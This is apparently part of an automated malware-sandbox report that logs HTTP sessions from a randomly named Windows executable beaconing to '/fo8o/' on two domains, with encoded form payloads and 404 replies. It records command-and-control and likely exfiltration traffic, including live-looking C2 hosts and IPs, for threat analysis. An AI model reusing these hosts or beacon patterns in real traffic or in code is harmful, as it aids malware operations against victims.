            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64
            Data Ascii: blWd=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad
            Aug 2, 2024 13:51:22.977735996 CEST | 492 | IN | HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=us-ascii
            Server: Microsoft-HTTPAPI/2.0
            Date: Fri, 02 Aug 2024 11:51:21 GMT
            Connection: close
            Content-Length: 315
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            6 | 192.168.2.6 | 49729 | 116.50.37.244 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:24.605706930 CEST | 828 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.goldenjade-travel.com
            Origin: http://www.goldenjade-travel.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.goldenjade-travel.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 4c 69 58 32 4d 73 42 35 37 30 4d 56 38 76 32 42 49 49 68 41 6c 2b 38 2b 42 70 78 61 52 6b 2f 44 62 30 6e 74 44 6e 41 5a 64 45 59 67 3d 3d
            Data Ascii: blWd=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwLiX2MsB570MV8v2BIIhAl+8+BpxaRk/Db0ntDnAZdEYg==
            Aug 2, 2024 13:51:25.497365952 CEST | 492 | IN | HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=us-ascii
            Server: Microsoft-HTTPAPI/2.0
            Date: Fri, 02 Aug 2024 11:51:25 GMT
            Connection: close
            Content-Length: 315
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            7 | 192.168.2.6 | 49730 | 116.50.37.244 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:27.144884109 CEST | 1841 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.goldenjade-travel.com
            Origin: http://www.goldenjade-travel.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.goldenjade-travel.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 78 78 5a 52 42 6e 6e 4f 6d 38 30 5a 50 75 46 57 32 35 57 38 33 63 2f 75 7a 74 41 38 6f 49 79 36 5a 78 35 31 51 37 47 6b 34 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 57 45 4f 78 51 32 58 67 70 56 6f 63 78 76 32 57 77 2b 4b 4d 2b 33 71 61 42 6f 69 6c 59 36 74 46 42 74 67 56 56 49 78 73 33 66 6b 30 51 50 58 72 61 68 39 70 4c 53 54 37 41 78 58 65 4c 63 70 74 74 44 61 36 75 65 43 48 54 68 55 66 34 45 37 54 4a 49 [TRUNCATED]
            Data Ascii: blWd= [TRUNCATED]
            Aug 2, 2024 13:51:28.047764063 CEST | 492 | IN | HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=us-ascii
            Server: Microsoft-HTTPAPI/2.0
            Date: Fri, 02 Aug 2024 11:51:27 GMT
            Connection: close
            Content-Length: 315
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            8 | 192.168.2.6 | 49733 | 116.50.37.244 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:29.675618887 CEST | 532 | OUT | GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.goldenjade-travel.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:51:30.591144085 CEST | 492 | IN | HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=us-ascii
            Server: Microsoft-HTTPAPI/2.0
            Date: Fri, 02 Aug 2024 11:51:30 GMT
            Connection: close
            Content-Length: 315
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            9 | 192.168.2.6 | 49734 | 46.30.211.38 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:35.641633034 CEST | 801 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.antonio-vivaldi.mobi
            Origin: http://www.antonio-vivaldi.mobi
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.antonio-vivaldi.mobi/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 6b 52 35 38 65 32 62 58 69 70 4f 6a 51 67 39 6e 58 49 5a 50 54 73 6a 6b 6e 6c 36 6b 56 4e 59 54 70 6e 41 61 59 37 75 74 36 56 71 57 44 58 49 4f 36 55 6f 74 53 70 6f 38 4f 56 2f 4e 4e 5a 53 39 32 39 6e 4c 43 63 50 43 44 48 4a 65 37 35 51 32 66 46 4f 70 35 50 7a 68 78 53 4f 58 48 69 4e 78 6d 7a 61 6d 6d 45 2f 4a 74 73 59 39 32 6c 49 62 39 6e 41 55 2b 67 6e 51 41 4b 75 6e 65 53 4e 74 6e 30 74 57 37 64 63 49 2f 48 79 63 76 4b 62 52 33 31 30 4f 6e 68 4a 69 6a 43 47 38 4c 6f 4d 33 48 36 62 50 47 72 41 6e 64 56 48 69 4e 7a 7a 49 72 37 43 74 30 2b 76 58 4f 4a 73 55 63 48 34 70
            Data Ascii: blWd=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OnhJijCG8LoM3H6bPGrAndVHiNzzIr7Ct0+vXOJsUcH4p
            Aug 2, 2024 13:51:36.306050062 CEST | 738 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Fri, 02 Aug 2024 11:51:36 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            10 | 192.168.2.6 | 49735 | 46.30.211.38 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:38.177252054 CEST | 825 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.antonio-vivaldi.mobi
            Origin: http://www.antonio-vivaldi.mobi
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.antonio-vivaldi.mobi/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 4d 54 6f 46 49 61 62 35 47 74 2f 56 71 57 4c 33 49 50 33 30 6f 6b 53 70 6c 44 4f 55 44 4e 4e 5a 47 39 32 35 76 4c 43 76 33 4e 42 58 4a 51 77 5a 51 34 62 46 4f 70 35 50 7a 68 78 53 61 78 48 69 6c 78 6d 67 43 6d 6e 6c 2f 4b 7a 38 59 2b 78 6c 49 62 77 48 41 59 2b 67 6d 7a 41 4c 7a 38 65 55 52 74 6e 77 70 57 38 4d 63 4a 71 33 7a 58 78 36 61 42 36 46 46 79 35 43 45 64 74 68 2b 4f 61 4b 67 4f 43 4d 61 56 61 59 41 45 50 46 6e 67 4e 78 72 36 72 62 43 48 32 2b 58 58 63 65 67 7a 54 7a 64 4b 37 59 57 78 57 2b 42 45 70 4f 51 6a 49 54 4a 69 68 69 56 67 4b 67 3d 3d
            Data Ascii: blWd=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPFngNxr6rbCH2+XXcegzTzdK7YWxW+BEpOQjITJihiVgKg==
            Aug 2, 2024 13:51:38.848763943 CEST | 738 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Fri, 02 Aug 2024 11:51:38 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            11 | 192.168.2.6 | 49736 | 46.30.211.38 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:40.713829994 CEST | 1838 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.antonio-vivaldi.mobi
            Origin: http://www.antonio-vivaldi.mobi
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.antonio-vivaldi.mobi/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 30 54 70 77 45 61 62 65 79 74 34 56 71 57 42 58 49 43 33 30 70 32 53 70 73 4b 4f 55 50 64 4e 63 43 39 30 65 76 4c 45 65 33 4e 62 48 4a 51 2f 35 51 31 66 46 4f 77 35 4c 66 6c 78 53 4b 78 48 69 6c 78 6d 6d 47 6d 67 30 2f 4b 30 4d 59 39 32 6c 49 66 39 6e 42 78 2b 67 2f 49 41 4c 6e 73 65 43 68 74 6d 55 4e 57 35 36 49 4a 32 6e 7a 56 77 36 62 45 36 46 4a 58 35 43 5a 6d 74 67 4b 6f 61 4a 38 4f 43 72 6e 36 4a 70 34 44 65 32 6d 59 54 54 54 4d 73 4f 47 74 75 75 4c 74 4b 4e 5a 44 53 77 56 2b 30 2f 65 72 54 39 4a 47 6a 4d 38 63 47 33 55 38 73 54 51 48 61 33 67 6d 74 35 30 6f 35 74 63 35 55 70 51 39 55 74 35 61 33 37 58 63 58 4b 44 6f 44 31 6a 68 33 36 64 51 49 4e 76 67 4a 31 68 62 43 72 54 4f 6d 38 30 32 49 52 78 34 6d 51 30 46 68 61 34 42 68 38 69 67 4d 61 6d 31 58 72 33 54 66 46 35 4b 67 46 71 61 2b 41 6a 46 51 48 56 6b 75 32 6d 38 74 32 6c 4b 39 34 50 31 2b 6a 2f 78 51 [TRUNCATED]
            Data Ascii: blWd=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 [TRUNCATED]
            Aug 2, 2024 13:51:41.360732079 CEST | 738 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Fri, 02 Aug 2024 11:51:41 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
